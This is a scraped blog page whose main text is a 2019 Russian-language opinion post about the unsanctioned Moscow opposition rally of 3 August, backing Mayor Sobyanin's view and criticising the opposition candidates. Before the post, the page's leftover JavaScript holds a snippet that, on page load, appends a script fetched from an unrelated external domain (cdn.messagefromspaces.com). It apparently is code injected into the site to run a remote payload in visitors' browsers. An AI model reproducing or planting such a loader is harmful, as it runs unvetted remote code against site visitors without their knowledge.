, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Мэр Москвы прав

04 Авг

Мэр Москвы Сергей Собянин заявил https://www.vedomosti.ru/politics/news/2019/08/04/808019-v?utm_source=yxnews&utm_medium=desktop , что многие из пришедших на несогласованную акцию 3 августа не имели отношения к выборам в Мосгордуму, и не ожидали такого развития событий, но организаторам, видимо, очень хотелось втянуть их в беспорядки.  В многомиллионном городе втянулось не более двух тысяч человек. Ясно, что при такой поддержке стать депутатом Мосгордумы невозможно.

МВД сообщило, что на акции оппозиции задержаны 600 человек, общее количество участников несогласованной акции полиция оценила в 1500 человек.

Смехотворной выглядит сама идея проведения акции с требованием регистрации независимых кандидатов в Мосгордуму.

У этих «независимых» кандидатов, как сообщают https://www.rbc.ru/politics/13/07/2019/5d2a2c939a79476a82de2bd6   СМИ, выявили массу нарушений при исполнении законных  требований  для получения статуса «кандидат».

Однако, игнорируя эти сведения, в Санкт-Петербурге была организована согласованная акция «Питер за Москву». На согласованный митинг в Санкт-Петербурге пришло не более 3 тыс. человек.  Поддержка не велика.

Поражает то, что  идущие в законодательную власть, ничего не говорят о том, какие положения Конституции они собираются отстаивать, как обеспечивать достойную жизнь москвичам?

Они идут не осуществлять государственную власть по воле народа, изложенной в Конституции России, а приватизировать власть и установить своё самовластие.

Анализ деятельности некоторых «оппозиционеров» показывает, что их не волнует то, что фактически затраты на одного депутата  в 139 раз превышают установленный в стране прожиточный минимум, что  зарплата Путина в 93 раза превышает установленный в стране прожиточный минимум.

Никто из «оппозиционеров»,  ранее имевших статус «депутата» не добивались того, чтобы заработная плата депутатов была тесно связана с зарплатой обычных граждан. Никто из них не отказывался от зарплат и затрат на них бюджетных средств, что в  139 раз превышают установленный в стране прожиточный минимум

Да, надо признать, что сегодня осуществляющие государственную власть, утратили чувство меры, совести и не дружат со здравым смыслом. Они, игнорируя мировой опыт,  намерили себе зарплаты, превышающие в 80−100 раз те, что получает большинство россиян. Но и этого им  мало.

Допущенные к осуществлению власти соучаствуют в различных хищениях бюджетных средств. Однако  глава государства 19 лет имитирует борьбу с коррупцией, не давая широкого применения п.п. 8 п. 2 статьи 235 ГК РФ, по изъятию у чиновников «сомнительной собственности».

Зачем митинги и шествия, когда половина избирателей, получающая не более 35  тыс. руб. и 20 млн. россиян, что получают за свой труд на уровне прожиточного минимума, могут мирным путём, путём выборов, избрать во власть, имеющих совесть и дружащих со здравым смыслом? Такие люди в стране есть и их труд на благо россиян нельзя не заметить.

Но называющие себя «оппозиция» этим критериям не соответствуют.

Они не знают, как установить в стране власть Конституции, обеспеченную её гарантом и правосудием, которые только и смогут победить то, ничем не умеряемое самовластие, что правит в России.

Осуществляющие государственную власть в этот раз оказались правы.

Они  стали осуществлять волю народа, изложенную к Конституции России, а именно: — признавать, соблюдать и защищать права и свободы человека и гражданина, доказывая, что Человек, его права и свободы являются высшей ценностью; — доказывать, что  захват власти или присвоение властных полномочий преследуется по федеральному закону; — убеждая,  что осуществление прав и свобод человека и гражданина не должно нарушать права и свободы других лиц.

ЭХО Москвы опубликовать этот пост не решилось. Ответ был таков:  Пост не опубликован, в публикации отказано

Пост отклонён редактором

А объяснить почему?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.